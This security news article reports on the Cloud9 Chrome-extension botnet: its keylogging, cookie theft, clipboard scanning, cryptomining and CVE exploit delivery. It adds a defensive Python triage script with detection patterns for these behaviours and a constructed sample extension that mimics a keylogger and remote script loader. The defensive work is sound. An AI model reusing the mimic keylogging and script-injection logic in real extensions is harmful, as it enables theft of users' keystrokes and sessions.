Friday, November 1, 2024

Malicious Chrome Plugin Let Remote Attacker Steal keystroke and Inject Malicious Code


Researchers at Zimperium zLabs recently identified a new Chrome browser botnet called ‘Cloud9’ that uses malicious extensions to:

  • Steal online account credentials
  • Log keystrokes
  • Inject ads
  • Inject malicious JavaScript code
  • Enroll the victim’s browser in DDoS attacks

Targeting web browsers is becoming increasingly attractive to malware developers, because browsers hold the most valuable information about a user.

Everyday activity leaves a detailed trail in keystrokes and session cookies, and anyone who gains access to that data can breach security or violate privacy.


The Cloud9 botnet is a RAT that affects all Chromium-based web browsers, including consumer favourites such as Chrome and Microsoft Edge. Threat actors can also use this RAT to remotely execute arbitrary commands.

Technical Analysis

The official Chrome Web Store does not host this malicious extension, so it cannot be downloaded from there.

Instead, the malware is distributed through communities operated by threat actors: users of the tool hide the malware before the tool itself delivers it to victims.

The extension consists of only three JavaScript files, and most of its functionality lives in a file called “campaign.js”.

According to the report, campaign.js uses the window.navigator API during initialization to identify the system’s operating system. Once the target has been identified, it injects a JavaScript file that mines cryptocurrency using the resources of the victim’s computer.

It then injects another script, cthulhu.js, which contains a full-chain exploit for the following flaws:

  • CVE-2019-11708 (Firefox)
  • CVE-2019-9810 (Firefox)
  • CVE-2014-6332 (Internet Explorer)
  • CVE-2016-0189 (Internet Explorer)
  • CVE-2016-7200 (Edge)

As soon as the vulnerabilities are exploited, Windows malware is automatically installed and executed on the host machine. This gives attackers even more opportunities to compromise systems and carry out more severe malware attacks.

One of the more sophisticated components of this malware is “Clipper,” a module that continuously scans the system clipboard for copied data such as:

  • Passwords
  • Credit card details

Cloud9 also silently injects ads into webpages, generating revenue for its operators through ad impressions.

Cloud9 Botnet Functionalities

The report lists several key functionalities of this malware that threat actors can abuse:

  • Send GET/POST requests, which can be used to fetch malicious resources.
  • Cookie stealing, which can compromise user sessions.
  • Keylogging, which could be used to steal passwords among other things.
  • Layer 4 / Layer 7 hybrid attack, used to perform DDoS attacks from the victim’s PC.
  • OS and browser detection, for next-stage payloads.
  • Open pop-unders, used to inject ads.
  • Execute JavaScript code from other sources, used to inject more malicious code.
  • Silently load webpages, used to inject ads or more malicious code.
  • Mine cryptocurrencies in the browser, using the victim’s computer resources.
  • Send browser exploits, used to take control of the device by executing malicious code on it.
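For defenders triaging an unpacked Chromium extension, the functionality list above maps to a handful of manifest permissions and source-level patterns. The following script is an added example, not code from the report or from Cloud9; the pattern labels, the risk score and the sample extension it builds (a constructed `campaign.js` that only imitates the reported layout) are all assumptions made here.

```python
import json
import re
import tempfile
from pathlib import Path

# Permissions the reported behaviours need (session cookies, tabs, clipboard, traffic).
RISKY_PERMISSIONS = {"cookies", "clipboardRead", "webRequest", "tabs", "<all_urls>"}

# Source patterns for functionalities named in the report; the labels are ours.
BEHAVIOUR_PATTERNS = {
    "keylogging": re.compile(r"addEventListener\(\s*['\"]key(?:down|press|up)['\"]"),
    "clipboard_scan": re.compile(r"navigator\.clipboard\.readText|execCommand\(\s*['\"]paste"),
    "os_fingerprint": re.compile(r"\bnavigator\.(?:platform|userAgent|appVersion)\b"),
    "remote_script": re.compile(r"createElement\(\s*['\"]script['\"]|\beval\("),
    "cookie_access": re.compile(r"document\.cookie|chrome\.cookies\."),
}


def triage(ext_dir):
    """Return risky permissions, per-file behaviour hits and a crude risk score."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text())
    declared = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    risky = sorted(declared & RISKY_PERMISSIONS)
    hits = {}
    for js in sorted(ext_dir.rglob("*.js")):
        src = js.read_text(errors="ignore")
        found = [name for name, rx in BEHAVIOUR_PATTERNS.items() if rx.search(src)]
        if found:
            hits[js.name] = found
    # One point per risky permission and per behaviour hit; tune thresholds locally.
    score = len(risky) + sum(len(v) for v in hits.values())
    return {"permissions": risky, "files": hits, "score": score}


def build_sample():
    """Write a constructed extension that mimics the reported layout (not Cloud9's code)."""
    d = Path(tempfile.mkdtemp())
    (d / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "sample", "version": "1.0",
        "permissions": ["cookies", "tabs", "storage"], "host_permissions": ["<all_urls>"],
    }))
    (d / "campaign.js").write_text(
        "const os = navigator.platform;\n"
        "document.addEventListener('keydown', e => send(e.key));\n"
        "const s = document.createElement('script'); s.src = REMOTE; document.head.appendChild(s);\n"
    )
    (d / "helper.js").write_text("export const version = 1;\n")
    return d
```

Point `triage()` at a real unpacked extension directory (for Chrome on Linux, under the profile's `Extensions` folder) to get the same report; a high score is a prompt for manual review, not proof of malice.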

As of right now, it is unknown how many victims have been affected. However, the evidence indicates that the malware’s victims and attack scope are not limited, since it targets no specific web browser or country.

Several of the C2 domains used in the recent campaign were also used in attacks launched by the Keksec malware group in the past, which suggests that the hackers behind Cloud9 have ties to them.


Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
